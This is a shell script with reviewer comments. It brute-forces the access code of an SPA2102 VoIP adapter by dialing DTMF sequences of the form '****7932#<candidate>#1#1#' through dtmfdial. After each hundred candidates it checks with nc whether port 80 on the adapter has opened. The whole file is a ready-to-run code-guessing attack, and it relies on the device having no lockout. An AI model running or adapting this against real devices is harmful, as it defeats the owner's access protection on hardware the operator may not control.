#
# DTMF bruteforcer for SPA2102, written by Tore Sinding Bekkedal
#
# Walks the integers START_NUM..END_NUM as candidate codes. Candidates are
# queued as "7932#<candidate>#1#1#" and the queue is handed to dtmfdial,
# prefixed with "****", each time the counter reaches a number ending in 0.
# Each time the counter reaches a number ending in 00, TCP port 80 on SPA_IP
# is probed with nc; an open port is treated as success.
#
# NOTE(review): "****" presumably opens the adapter's voice configuration
# menu and 7932 presumably selects its web-server option -- neither is
# established by this file; confirm against the SPA2102 documentation.
#
# NOTE(review): the loop contains no back-off or lockout handling, so it
# relies on the device accepting an unbounded number of wrong codes from
# the phone port. The observable side effects are a long run of menu entries
# on the analog line and, on success, port 80 becoming reachable at SPA_IP.
#

TONE_TIME=40       # passed to dtmfdial --tone-time (presumably milliseconds)
START_NUM=0        # first candidate
END_NUM=100000     # last candidate (inclusive)
SPA_IP=10.0.0.4    # address probed on port 80 by the web server check

echo -n "Beginning scan from $START_NUM to $END_NUM"

num=$START_NUM
while [ "$num" -le "$END_NUM" ]; do
  case "$num" in
    *0)
      # Batch boundary: dial whatever has been queued since the last one
      # and report how many seconds the dialing took.
      started=$(date +%s)
      # The queue is empty when every number in the batch contained a '1';
      # dtmfdial is not invoked in that case.
      if [ -n "$STRING" ]; then
        dtmfdial --tone-time "$TONE_TIME" "****$STRING"
      fi
      finished=$(date +%s)
      elapsed=$(( finished - started ))
      STRING=""
      printf " (%03d s)..." "$elapsed"

      case "$num" in
        *00)
          # Every tenth batch: see whether port 80 answers on the adapter.
          echo -n "(web server check)..."
          if nc -z "$SPA_IP" 80; then
            echo -e '\nCOMBINATION HAS BEEN FOUND!'
            # fanfare must be supplied by user ;)
            mplayer -volume 100 -loop 0 fanfare.mp3
            exit
          fi
          ;;
      esac
      echo
      ;;
  esac

  case "$num" in
    *1*)
      # Unlike all other digits, the digit 1 only represents itself, so
      # candidates containing it are skipped as the least productive ones.
      # If it becomes likely that a 1 was missed, a later pass can cover
      # only the candidates that contain a 1.
      ;;
    *)
      # Invoking dtmfdial has significant overhead, so candidates are
      # queued here and dialed together once per batch of ten numbers.
      STRING="${STRING}7932#${num}#1#1#"
      ;;
  esac

  # Progress output is printed for skipped and queued candidates alike.
  printf "%09d " "$num"
  num=$(( num + 1 ))
done